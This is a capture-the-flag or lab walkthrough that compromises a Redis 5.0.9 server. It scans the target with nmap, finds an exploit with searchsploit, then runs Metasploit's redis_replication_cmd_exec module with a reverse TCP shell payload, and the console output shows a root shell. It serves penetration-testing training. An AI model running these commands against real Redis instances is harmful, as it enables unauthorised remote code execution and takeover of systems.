TL;DR
- Exploit Redis to get RCE
Enumeration:
Port Scan
Start with Nmap to find out the services running on the target machine.
$ nmap -sVC -T4 -v -p- -oN nmapFull.txt $ipNmap scan report for 192.168.212.69Host is up (0.24s latency).Not shown: 65529 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)| ssh-hostkey:| 2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)| 256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)|_ 256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)53/tcp closed domain80/tcp open http nginx 1.10.3| http-methods:|_ Supported Methods: GET HEAD|_http-server-header: nginx/1.10.3|_http-title: Welcome to nginx!6379/tcp open redis Redis key-value store 5.0.98080/tcp open http-proxy| http-methods:|_ Supported Methods: GET HEAD POST OPTIONS| http-robots.txt: 3 disallowed entries|_/admin/ /reset/ /compose|_http-title: Home | NodeBB27017/tcp open mongodb MongoDB 4.0.18Searchsploit
From the scan, we notice a Redis service (v5.0.9) running on the target system. Perform a quick search using searchsploit to see if that particular version of Redis has any vulnerability.
$ searchsploit redis 5--------------------------------------------------- --------------------------------- Exploit Title | Path--------------------------------------------------- ---------------------------------Microsoft Windows 10 - Diagnostics Hub Standard Co | windows/local/45244.txtRedis 4.x / 5.x - Unauthenticated Code Execution ( | linux/remote/47195.rbRedis 5.0 - Denial of Service | linux/dos/44908.txtRedis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py--------------------------------------------------- ---------------------------------Shellcodes: No ResultsSeems like Redis 5.x does have an vulnerability, an RCE at that.
Exploitation
Using Metasploit:
Use the module linux/redis/redis_replication_cmd_exec and set options as follows.
$ msfconsole...msf5 > use linux/redis/redis_replication_cmd_execmsf5 exploit(linux/redis/redis_replication_cmd_exec) > show options
Module options (exploit/linux/redis/redis_replication_cmd_exec):
Name Current Setting Required Description ---- --------------- -------- ----------- CUSTOM true yes Whether compile payload file during exploiting PASSWORD foobared no Redis password for authentication test RHOSTS 192.168.212.69 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 6379 yes The target port (TCP) SRVHOST 192.168.83.129 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 6379 yes The local port to listen on.
Payload options (linux/x64/shell_reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.83.129 yes The listen address (an interface may be specified) LPORT 8080 yes The listen port
Exploit target:
Id Name -- ---- 0 AutomaticMake sure to user the port that is open in target system as lport so it doesn’t get blocked by firewall. After setting up the required options run the exploit and wait for the shell
msf5 exploit(linux/redis/redis_replication_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.83.129:8080[*] 192.168.212.69:6379 - Compile redis module extension file[+] 192.168.212.69:6379 - Payload generated successfully![*] 192.168.212.69:6379 - Listening on 192.168.83.129:6379[*] 192.168.212.69:6379 - Rogue server close...[*] 192.168.212.69:6379 - Sending command to trigger payload.[*] Command shell session 2 opened (192.168.83.129:8080 -> 192.168.212.69:59796) at 2020-04-24 15:19:25 +0800[!] 192.168.212.69:6379 - This exploit may require manual cleanup of './fkyrakg.so' on the targetwhoamiroot
cat proof.txt<Redacted>Since, we get the shell as root there is no privilege escalation needed.